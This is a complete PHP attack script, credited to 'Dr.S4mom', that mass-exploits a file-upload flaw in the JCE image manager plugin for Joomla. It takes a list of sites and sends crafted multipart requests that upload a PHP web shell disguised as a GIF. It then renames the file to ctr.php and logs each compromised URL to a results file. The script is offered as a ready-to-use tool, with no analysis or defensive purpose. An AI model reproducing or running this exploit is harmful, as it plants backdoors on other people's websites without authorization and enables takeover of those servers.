jce shell upload

1. <?php
2. echo "
3. _____ _ _______ _____
4. / ____| | | |__ __| | __ \
5. | | _ _| |__ ___ _ __| | ___ __ _ _ __ ___ | |__) |_____ __
6. | | | | | | '_ \ / _ \ '__| |/ _ \/ _` | '_ ` _ \| _ // _ \ \/ /
7. | |___| |_| | |_) | __/ | | | __/ (_| | | | | | | | \ \ (_) > <
8. \_____\__, |_.__/ \___|_| |_|\___|\__,_|_| |_| |_|_| \_\___/_/\_\
9. __/ |
10. |___/
11.  
12. Jce Upload shell Exploiter Coded By Dr.S4mom
13.  
14.  
15. \n";
16.  
17.  
18. set_time_limit (0);
19.  
20. //this is our uploader, you can change it, if you whant
21. $up = '<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
22.  
23. //upload directory, you can change it if the directory is not writable
24. $dir = "/";
25.  
26. if (!isset ($argv[1]))
27. die ("\nUsage : php {$argv[0]} list.txt\n");
28.  
29. if (!file_exists ($argv[1]))
30. die ("\n\"{$argv[1]}\" File Not Found !\n");
31.  
32. $site = file ($argv[1]);
33.  
34.  
35. $file = fopen ("rslt.txt", "a");
36. $name = "ctr.php";
37.  
38. foreach ($site as $sites)
39. {
40. $sites = trim ($sites);
41. jce_upload ($sites, "by Dr.S4mom<br><br>".$up, $dir, $name); //upload as dz.gif & rename to .php
42.  
43. // check if uploaded & renamed :)
44. if (preg_match ("/Dr.S4mom/i", @file_get_contents ("$sites/images/stories/$name")))
45. {
46. echo "Done -> $sites/images/stories/$name\n";
47. fwrite ($file, "$sites/images/stories/$name\n");
48. }
49. elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/images/$name")))
50. {
51. echo "Done -> $site/images/$name\n";
52. fwrite ($file, "$sites/images/$name\n");
53. }
54. elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/$name")))
55. {
56. echo "Done -> $site/$name\n";
57. fwrite ($file, "$sites/$name\n");
58. }
59. else
60. echo "Not Vuln -> $sites\n";
61. }
62.  
63. fclose ($file);
64.  
65. function jce_upload ($site, $content, $up_dir, $rename)
66. {
67. $host = parse_url ($site, PHP_URL_HOST);
68. $path = parse_url ($site, PHP_URL_PATH);
69.  
70. if (!$path)
71. $path = "/";
72.  
73. $name = "dz.gif";
74.  
75. $data = "-----------------------------41184676334\r\n";
76. $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
77. $data .= "$up_dir\r\n";
78. $data .= "-----------------------------41184676334\r\n";
79. $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
80. $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
81. $data .= "-----------------------------41184676334\r\n";
82. $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
83. $data .= "1\r\n";
84. $data .= "-----------------------------41184676334\r\n";
85. $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"$name\"\r\n";
86. $data .= "Content-Type: image/gif\r\n\r\n";
87. $data .= "$content\r\n";
88. $data .= "-----------------------------41184676334\r\n";
89. $data .= "0\r\n";
90. $data .= "-----------------------------41184676334\r\n";
91. $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
92. $data .= "upload\r\n";
93. $data .= "-----------------------------41184676334--";
94.  
95. $packet = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload HTTP/1.0\r\n";
96. $packet .= "Host: $host\r\n";
97. $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
98. $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
99. $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
100. $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
101. $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
102. $packet .= "Accept-Encoding: deflate\n";
103. $packet .= "Connection: Close\r\n";
104. $packet .= "Proxy-Connection: close\r\n";
105. $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
106. $packet .= $data;
107. $packet .= "\r\n";
108.  
109. send ($host, $packet);
110.  
111. //folderRename
112. //fileRename
113. //fileCopy
114. $data = "json={\"fn\":\"folderRename\",\"args\":[\"$up_dir".$name."\",\"$rename\"]}";
115.  
116. $packet = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw HTTP/1.0\r\n";
117. $packet .= "Host: $host\r\n";
118. $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
119. $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
120. $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
121. $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
122. $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
123. $packet .= "Accept-Encoding: deflate\n";
124. $packet .= "X-Request: JSON\r\n";
125. $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n";
126. $packet .= $data."\r\n\r\n";
127.  
128. send ($host, $packet);
129. }
130.  
131. function send ($host, $packet)
132. {
133. if ($connect = @fsockopen ($host, 80, $x, $y, 3))
134. {
135. @fputs ($connect, $packet);
136. @fclose ($connect);
137. }
138. }
139.  
140. ?>